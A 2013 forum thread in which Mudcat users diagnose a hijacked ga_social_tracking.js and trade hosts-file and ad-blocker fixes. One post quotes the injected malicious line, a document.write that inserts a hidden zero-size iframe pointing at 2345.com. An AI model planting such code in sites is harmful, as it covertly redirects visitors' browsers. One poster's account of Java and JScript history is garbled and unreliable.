 sj |
||
|
||
Tech: Mudcat Trojan warnings
|
|
|
Subject: Tech: Mudcat Trojan warnings From: treewind Date: 10 Jul 13 - 03:27 AM Anyone else seeing this? Starting this morning, Kaspersky Internet Security is warning me, on every Mudcat page I open, about something called ga_social_tracking.js which allegedly contains some malware called Trojan-Clicker.JS.Iframe.gb It seems to have something to do with Google analytics, so unless something's gone very wrong at Google this may be a false alarm, but... does anyone know? I tell KIS to block the script every time, and the page then loads normally. I guess the only difference is that my link-following preferences aren't being logged and analysed. I suppose the Google analytics feed is needed for the advertisers... [sigh] |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Peter Date: 10 Jul 13 - 04:19 AM Seeing that too. The script is on Mudcat's server not google's so its not a legit google script. Looks like the Cat has been hacked to me. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: doc.tom Date: 10 Jul 13 - 04:35 AM I'm getting it too. Bloody Google spying on me - 'harmless' or not, I do not appreciate it. Tom |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Joe Offer Date: 10 Jul 13 - 04:48 AM If you Google ga_social_tracking.js, you'll find it described as "A simple script to automatically track Facebook and Twitter buttons using Google Analytics social tracking feature." Everything I've looked at, makes it appear to be a harmless utility. Notice has been sent to Max, so I'm sure he'll check it out. But I don't see any need for concern. Here's more information: http://www.lunametrics.com/blog/2012/03/29/tracking-social-google-analytics/ -Joe- |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Jack Campin Date: 10 Jul 13 - 06:06 AM This kind of clutter is never harmless. The more of it we get, the harder it becomes to spot anything really malicious in the welter of cookies, super-cookies, widgets, trackers, adverts and redirects that make using the web into a rodeo-roping contest with herds of space aliens. Mudcat is completely unusable without having a lot of this stuff blocked, and we get no help in deciding which of these gizmos has to go. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST Date: 10 Jul 13 - 06:17 AM I haven't seen it. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 10 Jul 13 - 06:23 AM The script is on Mudcat, but that doesn't necessarily mean it's been hacked. Google asks you to install analytics scripts on your own web site if you advertise on Google ("sponsored" search results) so you get feedback about who's responded to your adverts, and evidently (as in Mudcat's case) also if you display adverts, to feed back info to the advertisers. But as Kaspersky's flagging it, I thought I'd better ask before assuming it's a false positive and blindly accepting it. I appreciate that Max has to meet his expenses somehow, but if there was a sensibly priced tracking-free/ad-free option for Mudcat, I think I'd subscribe to keep all that cutter out. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 10 Jul 13 - 06:24 AM ...or even "keep that clutter out" |
|
Subject: RE: Tech: Mudcat Trojan warnings From: gnu Date: 10 Jul 13 - 07:11 AM One Mudcat has told me they are gone from Mudcat. Every time I load ANYTHING on Mudcat, my AV displays a big red warning box and blocks it... every single time I click. I can't handle that shit. Oh... *I'll* check back BUT, if I get a big red box, I won't stay. Track my ass. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Peter Date: 10 Jul 13 - 08:54 AM Just because the name is that of a legit script doesn't mean the script hasn't been infected. On the other hand it could be a false positive from Kaspersky. I am an Adsense publisher too and have never been prompted to install this script. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Jeri Date: 10 Jul 13 - 09:26 AM It might be that one particular anti-virus/malware program has very lately changed so it notices this thing, which I believe has been on Mudcat for quite a while, as in years. Does anyone who has a program other than Kaspersky get the alert? --"It" likely being the thing that tracks your clicking of various "share" buttons. Possibly automatically sharing posts/threads on other sites. I know Facebook and Twitter post whenever a music thread is added to. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: BanjoRay Date: 10 Jul 13 - 09:44 AM I've just logged in on a friend's computer, and haven't seen a sign of it. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: leeneia Date: 10 Jul 13 - 09:50 AM I've never seen it. Don't use Kaspersky. Don't use twitter or facebook. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: JHW Date: 10 Jul 13 - 10:26 AM Me neither. (Never done Twitter and gave up Facebook) Have Avira on this computer and AVG on the other. Google Analytics gives a staggering amount of STATISTICAL info on the users of my website though I don't buy any ads (and now like everywhere else they've 'improved' Analytics so the info is now incomprehensible) |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 10 Jul 13 - 11:02 AM The file "ga_social_tracking.js" that I get is not what it claims to be, but consists of a single line document.write("<iframe width='0' height='0' src='http://www.2345.com/?ktjwh202'></iframe>");Now my JavaScript is a bit rusty (haha), but obviously this script is called to insert the line mentioned in the 2345 thread into the HTML of each thread display.This fact alone now seems to prove that Mudcat has been hacked, hardly as a harmless prank. Immediate action is required. I for one disable JavaScript completely. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 10 Jul 13 - 02:12 PM Grishka: agreed. That doesn't look so good. Actually the whole 2345 Chinese site thing doesn't look good either. I can't think of any excuse for that to be there. (in which cased Kaspersky is right to flag it. Don't shoot the messenger!) |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 10 Jul 13 - 02:33 PM Once again, hopefully for everybody to understand:
|
|
Subject: RE: Tech: Mudcat Trojan warnings From: Stanron Date: 10 Jul 13 - 02:36 PM I've posted about this before and no one seemed interested but I'll try again here. I found a very simple, and I suspect old, browser called OffByOne. It is a free download. It's very small. There are no pop ups, no adverts, no hidden scripts, it's just a simple HTML browser. It's perfect for text based forum stuff like Muscat. It wont run videos and it wont run animated ads. It's very fast. Try it. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 10 Jul 13 - 02:42 PM Another simple remedy for lots of internet junk can be found by searching for "MVPS hosts file", downloading a copy and copying to the right place in your system. I have a copy of this, and have just added the lines to it. No more 2345.com for me! |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 10 Jul 13 - 02:46 PM While I typed, Max has reinstalled the old "ga_social_tracking.js", of 4622 bytes (whereas the hijacked one had 93 bytes). I hope he has eradicated the source (Trojan) as well. Best let us clear our browser caches and hope the attack is over, without real damage. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Greg F. Date: 10 Jul 13 - 03:00 PM No prob - stay off Shitter and FarceBook. Problem solved. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 10 Jul 13 - 03:45 PM "stay off Shitter and FarceBook. Problem solved." Certainly good advice, but if won't fix everything! |
|
Subject: RE: Tech: Mudcat Trojan warnings From: bobad Date: 10 Jul 13 - 03:56 PM Unplug your computer, lock your windows and doors and don't go out of your house - danger is everywhere. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Jack Campin Date: 10 Jul 13 - 04:16 PM Another simple remedy for lots of internet junk can be found by searching for "MVPS hosts file", downloading a copy and copying to the right place in your system. That used to work really well on MacOS 9. On OS X there doesn't seem to be any "right place". |
|
Subject: RE: Tech: Mudcat Trojan warnings From: gnu Date: 10 Jul 13 - 05:54 PM Well, call me paranoid iffin ya want but I pay Kaspersky $30 a year and they do a hellofalotta good work for me. I mean, imagine what I would caught for cruisin porn sites day and night! >;-) No red warning box now and Mr. Kaspersky is happy... me too. I didn't really wanna leave. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Q (Frank Staplin) Date: 10 Jul 13 - 06:08 PM Haven't seen any warning. My cable provider does a good job of providing security. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 11 Jul 13 - 04:54 AM On OS X there doesn't seem to be any "right place". http://osxdaily.com/2012/08/07/edit-hosts-file-mac-os-x/ I'd have guessed /etc/hosts - though it seems from the above that this may be a link to /private/etc/hosts. Anyway, seemingly either will work. Despite the Microsoft association with MVPS, the "hosts" file works on all systems - mine is on Linux boxes at home and at work. Oh yes, Kaspersky has stopped complaining here too. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Greg F. Date: 11 Jul 13 - 08:52 AM Unplug your computer, lock your windows ... So, Bo- taking reasonable precautions, in your world, makes one a paranoid Luddite. Fascinating. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: maeve Date: 11 Jul 13 - 10:45 PM It's back. I'm gone until it is. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST Date: 11 Jul 13 - 10:59 PM Have you seen "Poltergeist"? |
|
Subject: RE: Tech: Mudcat Trojan warnings From: kendall Date: 12 Jul 13 - 05:45 AM It just popped up. Kasperski blocked it. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 12 Jul 13 - 07:25 AM Indeed, it's back, the hijacked version of the file "ga_social_tracking.js" of just 93 bytes. Max had reinstalled the intended one on the server, but the Trojan is still active on his own computer. He should make more of an effort to eradicate it. I disable all scripting in my browser. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST Date: 12 Jul 13 - 01:43 PM "I disable all scripting in my browser." What is scripting, Grishka? (Computer dodo, that's me.) |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 12 Jul 13 - 02:51 PM Dodo, scripting is the execution of script programmes such as "ga_social_tracking.js" by the browser. The most popular scripting language is JavaScript or JScript. In your browser options, you can disable the execution for particular sites. See Wikipedia and your browser help for more details. To be honest, I am not an expert at all, but I can google and read Wikis. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Jeri Date: 12 Jul 13 - 02:54 PM Definition of "Script" from http://www.techterms.com/definition/script |
|
Subject: RE: Tech: Mudcat Trojan warnings From: gnu Date: 12 Jul 13 - 05:18 PM Didn't read any of the the above. Took me two red bixes and two event sounds to get this far. There will be another when I hit submit. I just can't be arsed to be annoyed. See ya on Facecbook. OH, yeah, as far as anyone asking, "Ya don't think they track ya on Facebook?" DUH! At least on FB, I don't have ta put up with the red boxes and the dramatic event warning music. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,.gargoyle Date: 13 Jul 13 - 07:20 AM Turn off java and turn off flash before entering mudcat. I do ........ and do the same for UK sites such as The Financial Times of London. It makes things easier and faster....I don't need no animated fish jumping from a blue frying pan. Sincerely, Gargoyle two quick clicks and the bartender will return your stuff. Why let the nitnoids bother you and why scatter a continuous trail of flash zombie cookies? .. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST Date: 13 Jul 13 - 07:37 AM Thank you, Grishka. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: JohnInKansas Date: 13 Jul 13 - 10:56 AM Java is a "language" developed by Sun Microsystems to be "universal" in all operating systems and on all computers, with an appropriate simple "interpreter." Structurally, it may be thought of as "like html" although as a programming language it is much more powerful and can do about anything to anybody when used by someone malicious. Microsoft had an "agreement" with Sun (according to Microsoft) that allowed them to include Java as a "free option" in Windows. Sun disagreed about the option, so there were continual exchanges of "Did too" - "Did not" - "Yes ya did" - "No we didn't" for a few decades, but nothing very serious ever came of it. Java has always been considered too powerful to be really safe. When Sun decided to "restructure" they sold Java to Oracle. Oracle immediately demanded "per copy royalties" from Microsoft, so it ceased being a free option in Windows. Oracle failed to provide useful support, so Java almost immediately displaced Flash (the previous leader) as "the source of all malware attacks." Some credible estimates are that in 2012 more than 50% of all successful malware exploits used Java.. A recent estimate was that it would take Oracle, if they worked hard on it, at least two years to patch known vulnerabilities - if no new ones were found. New ones have been found. There is a growing concensus that "home users" almost NEVER NEED JAVA AT ALL. I've seen only ONE program identified that might be fairly widely used "by the public" that requires JAVA. It's a particular one for Some businesses may have programs that require it, but they should know, or have advisors to tell you, if you must have it and when you need to turn it on. Otherwise, many advisors recommend that you just get rid of it. JScript is not the same thing as Java. It's just an "interpreter" that can read a number of different kinds of "scripts" in much the same way that your browser "interprets" html. JSript originated as "LiveScript," produced by a company whose name nobody remembers; but another company argued about the naming so both companies changed their name to spite each other and both disappeared soon after. Since the interpreter was left in limbo, it was tacked onto Java (as an app) and renamed JScript. Downloading Java has been an easy way to get JScript, and the JScript has been about the only part of Java most people ever used, but there are other "script readers" that apparently are able to handle JScripts in web pages quite adequately. Information on which one does it in which case is vague, and there are multiple suspects. When one of the declarations of disaster appeared several months ago, I made sure that I removed all prior Java installations and got and installed - from the source - the latest and best of the whole thing. Installation was verified. When I recently tried to check what versions I have, I found the answer to be - - - - NONE. ALL JAVA APPLICATIONS AND APPLETS HAVE DISAPPEARED FROM MY COMPUTER - and I didn't even notice that they were gone. I don't know whether Windows Malware Remover zapped them, whether Norton 360 removed them as "malware," or whether a Windows or IE update just took them away. JScripts still do what they say they do, and everything else still works as well as before. (If they'd do the same to Flash I'd have another celebratory brew.) [For info: I'm running Windows 7 Home Premium and Norton 360, with "AutoUpdates - install automatically" for both.] John |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Bill D Date: 13 Jul 13 - 11:12 AM I had several nice little programs that were JAVA based, but they were not necessary or any better than others that did almost the same thing. I too am getting along fine without JAVA. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: JohnInKansas Date: 13 Jul 13 - 11:13 AM An "explosion of red boxes" as mentioned by gnu quite probably comes from the Windows Security Setup. There have been several recent Java/JScript updates offered, but many of them have been "uncertificated." In some cases it may depend on which server delivered an update. When Windows tries to open any program it checks to see whether the program is "signed" so that the source is known, and usually runs a "checksum" verification that the code file is unchanged. If either of these fails, you get a "Are you sure you want to ..." that you can "click to allow." The problem is with the program that's trying to open to process an object like a script, and has NOTHING TO DO WITH whether the object is infected. Even if the user who's logged on has Administrator rights, all programs that don't require Admin authority will run at a lower level, but "Administrator Permission" will be asked before anything that violates the rules can open. It has (almost) nothing to do with infections or malware. John |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Jon Date: 13 Jul 13 - 11:33 AM Lot's I could disagree with above but I won't. I'll just comment that programs written in using the Java programming language are widely used by the general public. Most Android apps are written using it. See Davilik |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Stilly River Sage Date: 13 Jul 13 - 12:52 PM This seems to be a tempest in a teapot. Did it start with a new installation or the update of an antivirus program? Those programs every so often get a false positive on code or other programs. And when browsers change their coding with updates the antivirus sometimes sees something it can't parse and reports an error. I use a lot of browsers with different settings and applications to watch for problems. I use Win7 Ultimate. And haven't seen any of these glitches that are being reported at Mudcat. SRS |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Jack Campin Date: 13 Jul 13 - 01:57 PM The iframe is not a virus, from the Mudcat user's viewpoint. What it does is entirely normal web coding - it just has no conceivable innocent purpose. There's no reason for any anti-virus program to flag it. If you aren't seeing it there's something wrong with your browser, since it should be loading iframes when it sees them. But it seems likely it was some sort of virus or trojan that put it there. Only someone with access to Max's hardware can figure out what happened and fix it. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 13 Jul 13 - 02:19 PM The problem is real and remains as long as the file "http://www.mudcat.org/ga_social_tracking.js" has a length of just 93 bytes. You can use a download manager to test that. For those of us who do not block its execution, the damage is (at least) a dramatic increase in download traffic, everytime we open a thread. The damage for Max, apart from his presumably infested computer and loss of reputation, is that his "social tracking" no longer works. If we all block JavaScript, Mudcat will lose much of its ad revenue to boot. Max had best fix the problem quickly. Has he been informed that his first attempt was not permanently successful, since the Trojan or cracked password is still in force? |
|
Subject: RE: Tech: Mudcat Trojan warnings From: gnu Date: 13 Jul 13 - 02:52 PM SRS.... "This seems to be a tempest in a teapot." It sure is! But... my tea is spoiled and I expect it to be fixed by Mudcat and NOT by every Mudcatter. Is that too much to ask or am I just still technologically declined? In any case, I had three red boxes and warning tones before I could get to post this and I will only have tp put up with that shit one more time today... at my next click... submit. gnightgnu |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Don Firth Date: 13 Jul 13 - 03:18 PM For several days running, every time I accessed Mudcat, or tried to change from one thread to another, I'd get a message across the bottom of my screen telling me that Mudcat was not responding because it was running a long-running script, and gave me a box to click that said "Stop script." Every time I come on or tried to change from one thread to another. I even started a thread about it. Then, suddenly, I'm getting pop-up ads 'til hell won't have it. Then I get pop-up ads for stuff like "PC-Cleaner" and "Registry Fix" and warnings that my computer is running slow and I should buy their gizmo program that would fix it. Suspicious, I "X-ed" them off. Some of them wouldn't go away, and I had to do a computer restart. Some of which didn't ask me, they just started to download the bloody program! My web browser is Earthlink and I like to use Google for searches. When these unasked-for downloads got finished screwing up my computer, now, when I click the "Earthlink" icon, I get Bing, along with a pop-up ad for yet another "Registry Cleaner." I have to key in "Earthlink" to reach my web browser. NONE of this I wanted to download! Yet, there it is. Oh, yes! I have two e-mail boxes. One is Earthlink, and that one works. The other is Comcast, which I can still access, but now it won't let me open my e-mail. There is a very good service here in Seattle called "GeekServ," and they send a guy out to the house to exorcise demons like this from one's computer. Come Monday, I'm going to call them. Which, of course, is going to cost me. I don't know if this has anything to do with Mudcat, but it all started when I was on the 'cat. Don Firth P. S. By the way, I use neither Twitter nor Facebook. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,kendall Date: 13 Jul 13 - 03:27 PM Kasperski warns me of this trojan every time I come on line. It also says it has been blocked. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Bill D Date: 13 Jul 13 - 03:33 PM "My web browser is Earthlink " Not really, Don.. Earthlink is a internet service provider...an ISP. Browsers are Internet Explorer, Firefox, Opera...and a dozen more. (Just a technical point....) |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 13 Jul 13 - 04:04 PM A minute of googling shows that Earthlink do have a browser software of their own, presumably based on one of the popular browser engines. Don, check all "Settings", "Options", "Properties" etc. in your browser, and disable them experimentally. Use some anti-virus software. If you want advice, you need not threaten to shoot yourself; a "please" suffices. Mudcat cannot be blamed for everything; Max does not owe us a perfect world. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Stilly River Sage Date: 13 Jul 13 - 04:06 PM Then, suddenly, I'm getting pop-up ads 'til hell won't have it. Then I get pop-up ads for stuff like "PC-Cleaner" and "Registry Fix" and warnings that my computer is running slow and I should buy their gizmo program that would fix it. Suspicious, I "X-ed" them off. Some of them wouldn't go away, and I had to do a computer restart. Some of which didn't ask me, they just started to download the bloody program! Don, if you get a popup you shouldn't "x" it with the x on the corner of the screen that popped up, you should open the task manager and close it from there. Often times that X has been doctored so it is actually like hitting return, it looks like you accepting the download of malware. There may be something at Mudcat that isn't playing well with your browser, but it sounds like when you hit X you inoculated yourself with a problem. See if you can download and install Malwarebytes/ and scan and remove the problem. You may have to use safe mode and rename the download file to trick malware. SRS |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Stilly River Sage Date: 13 Jul 13 - 04:07 PM I think Kasperski is the problem. SRS |
|
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 13 Jul 13 - 06:25 PM No, Kaspersky is not responsible for the script file on Max's server getting changed. It has indeed been changed back to the fake script that pulls in 2345.com. There can't be a good reason for that to happen so Kaspersky is right to question it. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 14 Jul 13 - 06:11 AM I've done some research and thought a bit...
|
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Jon Date: 14 Jul 13 - 06:25 AM I'm also seeing union2.50bang.org which seems a bit odd and is also dropped by trojans. As with the 2345 site, my feeling is that the site itself is just increasing its ratings through increased hits. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Newport Boy Date: 14 Jul 13 - 07:08 AM Confirming what treewind says: Even if that site is harmless, every Mudcat page you load will be slowed down by having to download all that extra trash. I've blocked all references to 2345 and union250bang and loading of all pages is significantly faster - about half the time to load. Phil |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Jack Campin Date: 14 Jul 13 - 08:26 AM As with the 2345 site, my feeling is that the site itself is just increasing its ratings through increased hits. How would that work? The only sites involved in those hits are the Mudcat user's and 2345 itself. No site that does ratings gets to find out about it. A DDoS attack makes more sense. Maybe organized by one of 2345's competitors, or as part of an extortion racket. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Andrez Date: 14 Jul 13 - 08:42 AM Hmmmm interesting thread. Just adding for what its worth I'm running OSX 10.7.5 and Safari/Firefox as a browser but havent seen or experienced any of the above problems. I'm not doing a Mac vs PC thing but I wonder what the difference would be? Just a thought anyway. Good luck folks and hopefully Max or whoever sorts the problem out for all affected 'catters. Cheers, Andrez |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Jon Date: 14 Jul 13 - 08:47 AM Jack it's our browsers that do the downloading. Basically they make another page request on our behalf. At a guess, the http_referer may show the request originated from Mudcat but I can't really see that as being any different to say seeing someone clicked a link on Google to get to a site rather than going to it directly. As for DDoS, I wouldn't guess that this is generating enough traffic to break a site. If you looked at the sites individually, you would probably not be concerned with the time it took to get your 2345 or bang.org site. At Mudcat though, we are having to get both of these on top of Mudcat's own pages. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Jack Campin Date: 14 Jul 13 - 08:54 AM I'm running OSX 10.7.5 and Safari/Firefox as a browser but havent seen or experienced any of the above problems. You probably haven't looked. I only have a very old Safari here, but one of its features is an "Activity" window that you can bring up under the "Window" menu. I suppose it's still around somewhere. Open it, load Mudcat, click the triangle to expand the list of things being loaded, hit the reload button and watch. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Jack Campin Date: 14 Jul 13 - 05:38 PM At a guess, the http_referer may show the request originated from Mudcat but I can't really see that as being any different to say seeing someone clicked a link on Google to get to a site rather than going to it directly. If they go via Google, their ranking on Google will go up. If the download is initiated by a user running a Mudcat script, no ranking anywhere is affected at all. Sending the page is all cost and no benefit for 2345. As for DDoS, I wouldn't guess that this is generating enough traffic to break a site. If Mudcat has been hacked in this way, the chances are that thousands of other sites have been as well. Iframe-munging is a popular stunt to pull on Wordpress blogs. There are about 6o million of them, very few administered by anyone with much technical expertise. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: michaelr Date: 14 Jul 13 - 06:11 PM Newport Boy wrote: "I've blocked all references to 2345 and union250bang and loading of all pages is significantly faster - about half the time to load." Could you PLEASE explain in PLAIN ENGLISH how to do this? (Maybe I'm dense - I asked JohninKansas upthread to explain something in layman's terms and could not understand his response at all - but have mercy. I'm a music geek, not a tech geek.) |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,.gargoyle Date: 14 Jul 13 - 10:15 PM Mister M Do not worry... Mudcat was never intended for those as innocent as you. Sincerely, Gargoyle With the advent of the mega cell phone explosion of the last 40 months....each system demands to be proprietary...I phone does not like....and neither likes MS .... however Lynix is universal candies everyone. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Andrez Date: 14 Jul 13 - 10:22 PM Thanks Jack, I'm running Safari V 6.04. I dont have an 'activity' window under the Window menu nor is there a page source option. I'm sure there used to be some time ago. Maybe in your version? One thing though, I do run a whole pile of extensions to block ads, tracking etc. So maybe thats why my Mudcat browsing is so straightforward. Not to worry, thanks for the info anyway. I did find the source page on Firefox though. Will check out and look through the coding for script info when I have a little more spare time. Cheers, Andre |
|
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 15 Jul 13 - 03:18 AM Could you PLEASE explain in PLAIN ENGLISH how to do this? One way is to change your hosts file as I explained in either this thread or the "2345" thread - I don't remember which now... On Windows the file is here: C:\windows\System32\drivers\etc\hosts You can edit it with notepad - add the following lines to the end: 127.0.0.1 www.2345.com 127.0.0.1 2345.com ... for any other site you want to block, do similar 127.0.0.1 www.bad.malware.site The file downloadable from http://winhelp2002.mvps.org/ is a huge file to replace your hosts file, containing similar entries for several thousand malware and adware sites. Actually it doesn't currently include 2345.com, but it's easy enough to add more to the list as described above. On Mac OS X, Linux or other Unix-like systems, the same file is at /etc/hosts |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Jack Campin Date: 15 Jul 13 - 05:26 AM I hada look at my /etc/hosts file and there's nothing there except a few trick entries used at bootup. I'd consider using MVPS but I have a couple of worries. On MacOS 9 a large hosts file (from a similar third-party provider of blacklists) slowed Internet access down quite a lot and had quite a few false positives - sites that were slipped in for right-wing ideological reasons. MacOS X users: Does this provide acceptable performance? Can you access everything you want to? I currently have 2345 and union.50bang blocked by IP in my router, which seems to work okay but wouldn't be feasible with too many addresses. Also, if 2345 is really the target of the attack, blocking by either means is ethically the wrong thing to do. It's giving the attackers exactly the result they want. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Newport Boy Date: 15 Jul 13 - 06:19 AM @michaelr - Newport Boy wrote: "I've blocked all references to 2345 and union250bang and loading of all pages is significantly faster - about half the time to load." Could you PLEASE explain in PLAIN ENGLISH how to do this? (Maybe I'm dense - I asked JohninKansas upthread to explain something in layman's terms and could not understand his response at all - but have mercy. I'm a music geek, not a tech geek.) I'm using a version of Firefox with Adblock Plus. I haven't used Jack's nuclear option - I've only blocked the 2 addresses on the Mudcat front page. This is done in Adblock Plus. The location of buttons may be different in Windows, but the steps should be the same. 1. On Mudcat front page, click the down arrow by the ABP icon (bottom left of window for me). 2. Click 'Open blockable items' (shortcut Ctrl-Shift-V) 3. In the window that appears, right click on each target item and select 'Block this item'. You may find that 'Enter' does the same thing. 4 Done. Phil |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 15 Jul 13 - 06:30 AM The attacker wants us to download a particular page from 2345.com frequently, which we should definitely avoid. In other words, we should block it until Mudcat has got rid of the problem. Of the various methods suggested above, I think treewind's is easist: just add those two lines to the "hosts" file. Thanks, treewind. (Chinese Mudcatters who love 2345.com need some patience. As we saw, Max probably has a strong financial interest to reinstall his own "ga_social_tracking.js" quickly and permanently. He mey even find the services of a professional human ghostbuster worth their price.) |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Newport Boy Date: 15 Jul 13 - 06:55 AM I've just posted in the 'Mudcat/Firefox' thread, as below: Well - it looks like the changes to the page coding to include the 2345, etc calls are also the cause of the aberrant behaviour. This version of FF (19) on which I have blocked the 2345 addresses works correctly. FF22 on XP and all my other browsers, on which I've not blocked the addresses, behave wrongly. That's as I find it, anyway. Phil |
|
Subject: RE: Tech: Mudcat Trojan warnings From: bobad Date: 15 Jul 13 - 07:06 AM Windows 7 does not allow you to make additions to the hosts file unless you have administrator privileges which you don't by default. Does anyone know how to make yourself administrator in Win 7? |
|
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 15 Jul 13 - 07:08 AM The huge hosts file may slow access down on legitimate sites, on the other hand for sites that contain a links to a domain listed in the hosts file, it's probably quicker to find the hosts entry than to do a DNS lookup for that domain. As for the denial-of-service theory, Kaspersky does claim in a support forum somewhere that 2345.com is a malware site. They don't say what malware is there, and nothing is proven, also attempting to go direct to that page on 2345.com doesn't trigger a Kaspersky warning. It's the URL in that IFRAME link that it's objecting to. Maybe 2345.com used to host malware. The fact remains that the Mudcat site has had unauthorized content inserted, and that's bad. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: treewind Date: 15 Jul 13 - 07:21 AM "Does anyone know how to make yourself administrator in Win 7?" When it's installed, the first user created always has admin privileges. However all that means is that you will sometimes get asked for permission to perform certain operations. Not all programs know how to ask for that permission. Sometimes, if I try to edit a file in a privileged folder, the editor simply says it couldn't save it, but doesn't have any way of asking for permission. I got round that by copying the file to a folder in my home area (full read/write access) editing it there, then copying it back to the privileged folder. The copy operation (done by a desktop click and drag, not on the command line) then pops up a windows asking for permission, if you have administrator rights. I presume that if you don't have admin, it simply refuses to do it. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST Date: 15 Jul 13 - 07:21 AM Does anyone know how to make yourself administrator in Win 7? Control Panel\User Accounts and Family Safety\User Accounts\Manage Accounts\Create New Account |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 15 Jul 13 - 07:41 AM My recommendation is to add the lines 127.0.0.1 www.2345.comto the existing (essentially empty) "hosts" file, until Mudcat has solved the problem. I would not use the MVPS "hosts" file. It is possible that the malware only lurks on particular pages of 2345, not on the homepage. It could have been injected by a customer. Bobad: to make yourself admin if you aren't, you need Harry Potter's wand. Alternatively, log in to a user account with admin privileges (there is always at least one, as treewind writes) when starting Windows. If someone else has the password, ask her/him to do it. Phil: the Firefox "Back" button may be misbehaving because of the injected <iframe>, or objects injected inside it. Many reasons to block the 2345 page until further notice. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: bobad Date: 15 Jul 13 - 08:14 AM I am the administrator of my computer but am still not allowed to save additions to the hosts file. Following treewind's advice I saved the changes to my desktop then drag and dropped it back into the hosts file and there it rests snugly. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Max Date: 15 Jul 13 - 10:05 AM Grishka has it exactly right. This morning I have, for the 2nd time, thwarted the 2345 hijack of the Google social tracking script, this time by removing it altogether. I am however at a disadvantage being 1000 miles from home in a cabin on a lake in northern Wisconsin. I have limited abilities until I return home next week. I will do what I can from here for the rest of the week and assure you a full overhaul at the top of my priority list when I return home. I am very sorry for any trouble this has caused and next week will do what I can to remove as many of the doodads that I can that may annoy or have the potential to make us vulnerable for such a thing again. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Jack Campin Date: 15 Jul 13 - 10:31 AM I just added the Grishka-and-Anahata-as-approved-by-Max hosts file tweak. Makes a big difference to loading time, much more than the router block did. My guess is that DNS lookups for 2345 must be quite slow, either because they're away in China or because the attack is interfering. (And having zapped one site that way, my natural query is "what else can I hit with that?" - maybe the BBC's treacle-slow script-hosting site might get it). |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST Date: 15 Jul 13 - 11:06 AM Thank you, Max. I appreciate your efforts very much. I have now told Kaspersky this is a trusted site- I hope that is accurate, based on your first aid.tweak. I hope you can relax and enjoy your time on the lake. Maeve |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 15 Jul 13 - 12:17 PM Thanks, Max, for informing us and applying first aid. For those who have not noticed: Max has completely removed the call to "ga_social_tracking.js" from the HTML, and has changed that script to a harmless content. It is of course only a matter of time that the attacker strikes again as before, so I would keep 2345 blocked at least until the whole story is over. |
|
